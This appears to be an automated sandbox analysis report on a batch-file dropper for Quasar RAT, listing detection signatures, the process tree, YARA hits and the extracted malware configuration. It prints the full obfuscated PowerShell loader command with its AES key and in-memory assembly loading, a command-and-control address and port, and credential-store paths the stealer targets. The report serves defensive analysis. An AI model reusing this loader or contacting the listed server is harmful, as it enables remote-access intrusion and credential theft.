
Windows Analysis Report
deneme.bat

Overview

General Information

Sample Name:deneme.bat
Analysis ID:876996
MD5:140518164b4e215675accd37cae0d91f
SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
Tags:bat

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected Quasar RAT
Renames powershell.exe to bypass HIPS
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mode.com (PID: 5932 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
    • certutil.exe (PID: 6972 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
    • allah.bat.exe (PID: 6956 cmdline: "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] (''))) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware configuration (Quasar):
{"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOlTpo8LWfXRZIepKFV3RzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDUyMDE4NDcwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkc9l37JeZdDNiK5Nd7sqsX48TrYGmt8wpMOudDbHsJ9jQCTkD3mRy+BXeSJTOBGjzFaic5W8Wd5evNwi1sjsiTRo+0jGfXHsSV2LHHrUlOJVo/n0Jeyn+tk5+JrbQuMQTi8nIxoNIQBH26JldwOD4NGtk8JtnvAEj3s6jsqTszNBdzX9eUdlSmDF7C8Gs7MSO8aOFFcbxseOfRiKVx6J2C1kUurANTYxDnW+FW3+f0ES9sVVyMjcJVG3q83hTg/8wCLj5/z+D+j81PvtbaRtFbBkOtoMP8HeJtKZl9N7lS1WDO1bHRsTyaE71ZkbuUjtCRa87TvYyq8zKiHlklIPyF/JDaZJqC/R0Mp+oseIISooumlhSjTvOG981/dx5/bsf+zTG80KUf7jbefORcOAbf/kCzOhJ6QxM6aSKZmo7cADVmDdc3L5y6Pd1DDGkSUgyepeZ0dbNmiftNtZtIrWg8D/vJQBmWfTZtgNTL9sbgXVlNUc2kQIwkI1U6pE8XWbSSl60SqwkO+kOMuL7byhuefKmAUQGFbwh6Bsoao9Qq3WOEnKpwh6WaOlw4Yq6aznlAZ4HnUCWpqyQOj5E5wXMc2BxsDaP98UhH3oB/osvDjxGhEXuMsySisfrsrZr0nMhUCJR+1UfKhZFf2W1OOvCS2gLeQwX6S9P240E+FOIBUCAwEAAaMyMDAwHQYDVR0OBBYEFNjjH99zEKAJrNI0wsELubp4dsr7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAA9p4WnELDlsxMW4J6yYbMgpN0bCtHsTyILqWvwXfpjC884kfbVp5yEKrtXvtlnmldsRTWG9VBt8KvHqcW4TKAOiFJQAJ0b0i5mjFhFv5KNfj1pCc9qEmxx9eEtB0jemRwJHWEgqatkdlYh5WMpFaeOidZ/pdD7gEYQzK1uKsO57JIKoI6288Af2gVfddm/en0dzemjQwhwlvqRaxZRy+IGrhAP2JYYib0TGpwt1C6n9gdpmd5YMksShUCRPD7qby/Hvppuyj/RolEELCN9KHJWVEBDTnPdZi4nGCe45CsG6mKQ33Ad2vmIQ1OJztrjGWs4n6smcz6EpX3zP41UfrHktiCTSfJe3zIO7p0M/xvITAUKX2MMLgZVGo4e2WYlXiCle1cH2yg66+w4k0QHsY0qS+lMf3SC7Ea8CxkgTQkp173Ztxbi2PFTUmhPVYboiHBmug0Ds/jDAmv4Y3Br3bePcy3bmhBeiFGA7uQ4FQ5z6ew2PEIlZErD0z+41a2rMlEA8PkaxfPSmvVTBFT7jT8aJidXy9WLrGCFuokwaW47d6r7P50Hn6w5CT8EAeR5La239+oVVRGhEZsNDqM/Kcd/BV8dk7grMJgqhStHkl4+3gAipCnd6S7g6glUMUjSnxV7yCTb3jcVD0Z+4vEnujYFzM9IZy4BQL6NN994l1+6d"}
Source | Rule | Description | Author | Strings
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp | Rule: MAL_QuasarRAT_May19_1 | Description: Detects QuasarRAT malware | Author: Florian Roth (Nextron Systems)
  • 0x2a1b9e:$x1: Quasar.Common.Messages
  • 0x2b1ec7:$x1: Quasar.Common.Messages
  • 0x2be4ae:$x4: Uninstalling... good bye :-(
  • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_Quasar | Description: Yara detected Quasar RAT | Author: Joe Security
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_GENInfoStealer | Description: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
  • 0x2bda60:$f1: FileZilla\recentservers.xml
  • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
  • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2bdd2e:$b1: Chrome\User Data\
  • 0x2bdd84:$b1: Chrome\User Data\
  • 0x2be05c:$b2: Mozilla\Firefox\Profiles
  • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
  • 0x2be36a:$b5: YandexBrowser\User Data\
  • 0x2be3d8:$b5: YandexBrowser\User Data\
  • 0x2be0ac:$s4: logins.json
  • 0x2bdde2:$a1: username_value
  • 0x2bde00:$a2: password_value
  • 0x2be0ec:$a3: encryptedUsername
  • 0x322f75:$a3: encryptedUsername
  • 0x2be110:$a4: encryptedPassword
  • 0x322f93:$a4: encryptedPassword
  • 0x322f11:$a5: httpRealm
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp | Rule: MALWARE_Win_QuasarStealer | Description: Detects Quasar infostealer | Author: ditekshen
  • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
  • 0x2be598:$s3: Process already elevated.
  • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
  • 0x28b959:$s5: GetKeyloggerLogsDirectory
  • 0x2b1626:$s5: GetKeyloggerLogsDirectory
  • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords
Source | Rule | Description | Author | Strings
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Rule: MAL_QuasarRAT_May19_1 | Description: Detects QuasarRAT malware | Author: Florian Roth (Nextron Systems)
  • 0x2a1b9e:$x1: Quasar.Common.Messages
  • 0x2b1ec7:$x1: Quasar.Common.Messages
  • 0x2be4ae:$x4: Uninstalling... good bye :-(
  • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Rule: JoeSecurity_Quasar | Description: Yara detected Quasar RAT | Author: Joe Security
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Rule: INDICATOR_SUSPICIOUS_GENInfoStealer | Description: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
  • 0x2bda60:$f1: FileZilla\recentservers.xml
  • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
  • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2bdd2e:$b1: Chrome\User Data\
  • 0x2bdd84:$b1: Chrome\User Data\
  • 0x2be05c:$b2: Mozilla\Firefox\Profiles
  • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
  • 0x2be36a:$b5: YandexBrowser\User Data\
  • 0x2be3d8:$b5: YandexBrowser\User Data\
  • 0x2be0ac:$s4: logins.json
  • 0x2bdde2:$a1: username_value
  • 0x2bde00:$a2: password_value
  • 0x2be0ec:$a3: encryptedUsername
  • 0x322f75:$a3: encryptedUsername
  • 0x2be110:$a4: encryptedPassword
  • 0x322f93:$a4: encryptedPassword
  • 0x322f11:$a5: httpRealm
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Rule: MALWARE_Win_QuasarStealer | Description: Detects Quasar infostealer | Author: ditekshen
  • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
  • 0x2be598:$s3: Process already elevated.
  • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
  • 0x28b959:$s5: GetKeyloggerLogsDirectory
  • 0x2b1626:$s5: GetKeyloggerLogsDirectory
  • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack | Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "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"}
Source: deneme.bat | Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\allah.bat | Avira: detection malicious, Label: TR/Dldr.Malnote.U
Source: Yara match | File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR
Source: Binary string: powershell.pdbUGP | source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
Source: Binary string: powershell.pdb | source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr

Networking

Source: Yara match | File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Malware configuration extractor | URLs: 74.234.104.236
Source: Joe Sandbox View | ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: global traffic | TCP traffic: 192.168.2.3:49702 -> 74.234.104.236:3131
Source: unknown | TCP traffic detected without corresponding DNS query: 74.234.104.236 (15 identical entries in the report)
Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.cot
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipwho.is/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354

E-Banking Fraud

Source: Yara match | File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

System Summary

Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC11B9D6
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC119E22
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC111268
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC119076
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC112D98
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC1107D1
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC110803
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC110C90
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC5A7F59
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC5AEBED
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC5A9456
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC5AD84C
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe | Code function: 4_2_00007FFBAC5AA335
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\allah.bat.exe D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
Source: deneme.bat | Virustotal: Detection: 16%
Source: C:\Windows\System32\mode.com | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com Mode 60,3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
